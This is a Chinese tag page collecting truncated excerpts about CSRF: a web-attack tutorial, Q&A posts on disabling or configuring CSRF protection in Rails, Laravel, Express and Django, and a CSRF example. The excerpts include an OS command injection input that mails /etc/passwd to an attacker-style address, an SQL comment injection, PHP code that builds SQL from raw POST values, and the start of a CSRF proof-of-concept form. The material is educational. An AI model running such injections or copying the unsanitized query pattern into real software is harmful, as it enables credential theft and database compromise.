csrf | 易学教程

针对Web的攻击技术

阅读更多关于针对Web的攻击技术

主动攻击 SQL注入攻击 OS命令注入攻击会话劫持被动攻击 XSS攻击 CSRF攻击 HTTP首部注入攻击会话固定攻击一、主动攻击 1.SQL注入攻击什么是SQL？ SQL是用来操作关系型数据库管理系统的数据库语言，可进行操作数据或定义数据等。什么是SQL注入？ SQL注入是指针对Web应用使用的数据库，通过运行非法的SQL而产生的攻击。如果在调用SQL语句的方式上存在疏漏，就有可能执行被恶意注入非法SQL语句。 SQL案例： SELECT * FROM bookTb1 WHERE author = '作者'--' and flag = 1 SQL语句中的--之后全部视为注释，即and flag = 1就会被忽略。 2.OS命令注入攻击什么是OS命令注入攻击？ OS命令注入攻击是指通过Web应用，执行非法的操作系统命令达到攻击的目的。如何攻击？可以从Web应用中通过Shell来调用操作系统命令。如果调用的Shell时存在疏漏，就可以执行插入的非法OS命令。通过OS注入攻击可执行OS上安装的各种程序。示例： |/usr /sbin /sendmail ; cat /etc / passwd | mail hack@example.jp 攻击者输入值（; cat /etc / passwd | mail hack@example.jp）中含有分号（；）

Disable CSRF SiteWide

阅读更多关于 Disable CSRF SiteWide

Is there a way to disable CSRF for all controllers, or does it have to be disabled on a per-controller basis? I am using ruby on rails as an API only and do not need any sort of CSRF as the requests aren't anywhere near session based. I'd like to disable just for JSON requests. I believe this might work, but am unsure class ApplicationController < ActionController::Base # Prevent CSRF attacks by raising an exception. # For APIs, you may want to use :null_session instead. protect_from_forgery skip_before_action :verify_authenticity_token, if: :json_request? #Checks format for json protected def

Laravel X-CSRF-Token mismatch with POSTMAN

阅读更多关于 Laravel X-CSRF-Token mismatch with POSTMAN

问题 I try to talk to my REST API built with Laravel. But the call with POSTMAN is rejected due to a token mismatch. I guess I need to include the CSRF token in the header. But do I need the encrypted one? When I insert this token I still get the error that there is a token mismatch. I retrieve my token by using: $encrypter = app('Illuminate\Encryption\Encrypter'); $encrypted_token = $encrypter->encrypt(csrf_token()); return $encrypted_token; but is this supposed to change on every refresh? 回答1:

浅谈前端安全

阅读更多关于浅谈前端安全

安全问题的分类按照所发生的区域分类后端安全问题：所有发生在后端服务器、应用、服务当中的安全问题前端安全问题：所有发生在浏览器、单页面应用、Web页面当中的安全问题按照团队中哪个角色最适合来修复安全问题分类后端安全问题：针对这个安全问题，后端最适合来修复前端安全问题：针对这个安全问题，前端最适合来修复综合以上前端安全问题：发生在浏览器、前端应用当中或者通常由前端开发工程师来对其进行修复的安全问题浏览器安全同源策略是一种约定，是浏览器最核心也最基本的安全功能，限制了来自不同源的document或者脚本，对当前document读取或设置某些属性影响“源”的因素有：host（域名或者IP地址）、子域名、端口、协议对浏览器来说，DOM、Cookie、XMLHttpRequest会受到同源策略的限制不受同源策略的标签 <script>、<img>、<iframe>、<link> 等标签都可以跨域加载资源，而不受同源策略的限制这些带"src"属性的标签每次加载时，浏览器会发起一次GET请求通过src属性加载的资源，浏览器限制了javascript的权限，使其不能读、写返回的内容三大前端安全问题 1、跨站脚本攻击（XSS）定义英文全称：Cross Site Script，XSS攻击，通常指黑客通过“HTML注入”篡改了网页，插入了恶意的脚本

CSRF token not working in nodejs express

阅读更多关于 CSRF token not working in nodejs express

问题 I am developing a simple web app using nodejs, express and when i switched to session and csrf, my PUT, DELETE and POST Requests are failing. with error: error: Forbidden at Object.exports.error (appFolder/node_modules/express/node_modules/connect/lib/utils.js:63:13) at createToken (appFolder/node_modules/express/node_modules/connect/lib/middleware/csrf.js:82:55) I looked at this line, and found that it calls checkToken function which calls the defaultValue which finds the csrf token in the

Javascript hijacking, when and how much should I worry?

阅读更多关于 Javascript hijacking, when and how much should I worry?

问题 Ok, so I'm developing a web app that has begun to be more ajaxified. I then read a blog that talked about javascript hijacking, and I'm a little confused about when it's actually a problem. I want some clarification Question 1: Is this the problem/vulnerability? If my site returns json data with a 'GET' request that has sensitive information then that information can get into the wrong hands. I use ASP.NET MVC and the method that returns JSON requires you to explicitly allow json get requests

Remove csrf protecteion on API post calls

阅读更多关于 Remove csrf protecteion on API post calls

I would like to remove csrf from my Express 3.0 application as i don't need it there. I use oauth to validate clients. Is the a middleware to whitelist API urls when using express.csrf()? You can do that in two ways. 1.) Create a small middleware of your own to allow white list url patterns not to be blocked by csrf like; var express = require("express"); var expressCsrf = express.csrf(); var app = express.createServer(); var customCsrf = function (req, res, next) { // I assume exact match, but you can use regex match here var csrfEnabled = true; var whiteList = new Array("/pattern1/param1","

Is the {% csrf_token %} CSRF protection tag still necessary in Django 1.2?

阅读更多关于 Is the {% csrf_token %} CSRF protection tag still necessary in Django 1.2?

I am testing the CSRF protection on my site and I have noticed something unexpected. I removed {% csrf_token %} from my form and the submission still works. I couldn't work out why. I then looked at the source and realised the token was still there right next to the <form> element. I changed the ID of the form to make sure it was definitely updating the source and it was but the hidden input is still there. I am using Django 1.2. Is {% csrf_token %} still necessary? Cheers Rich Rich After more investigation it appears the {% csrf_token %} is always inserted if the form has method post and not

一个帖子csrf的例子

阅读更多关于一个帖子csrf的例子

服务端 1 <?php 2 $conn=mysqli_connect('localhost','root','root','csrf'); 3 $data=$_POST; 4 $user=$_POST['username']; 5 $pass=$_POST['password']; 6 if(!empty($data)){ 7 mysqli_query($conn,"insert into user(`username`,`password`)values('$user','$pass')"); 8 } 9 10 11 12 ?> 13 14 <form action="" method="POST"> 15 1<input type="text" name="username"/> 16 2<input type="text" name="password"/> 17 <button>提交</button> 18 </form> POC <form action="http://localhost/csrf/csrf.php" method="POST" id="testfrom"> <input type="hidden" name="username"/> <input type="hidden" name="password"/> </form> <script> var

django post请求

阅读更多关于 django post请求

django中提交post请求时候，需要携带CSRF，否则会报403错误，此时需要在form中添加｛% csrf_token %｝或者注释掉settings.py -> MIDDLEWARE -> 'django.middleware.csrf.CsrfViewMiddleware',但是极不推荐！用ajax发送post异步请求时，也需要在data中添加在data中添加：1.　var csrf=$('input[name="csrfmiddlewaretoken"]').val()　　　data:{'csrfmiddlewaretiken',csrf}2.data:{'csrfmiddlewaretoken':"{{ csrf_token }}"}实例，亲测有效：<script> $(function () {#get请求 $('#h1').click(function () { $.ajax({ url:"{% url 'index:ajg' %}", success:function (res) { alert(res) } }) }), $('#h2').click(function () { var csrf = $('input[name="csrfmiddlewaretoken"]').val();#post请求 $.ajax({ url:"{% url

订阅 csrf